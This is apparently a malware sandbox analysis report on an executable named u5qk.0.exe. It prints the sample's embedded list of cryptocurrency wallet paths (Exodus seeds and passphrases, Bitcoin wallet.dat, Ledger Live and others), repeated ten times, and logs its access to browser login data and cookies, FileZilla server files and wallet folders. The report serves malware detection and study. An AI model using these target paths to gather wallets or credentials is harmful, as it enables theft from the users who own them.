Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: u5qk.0.exe, 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: \|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
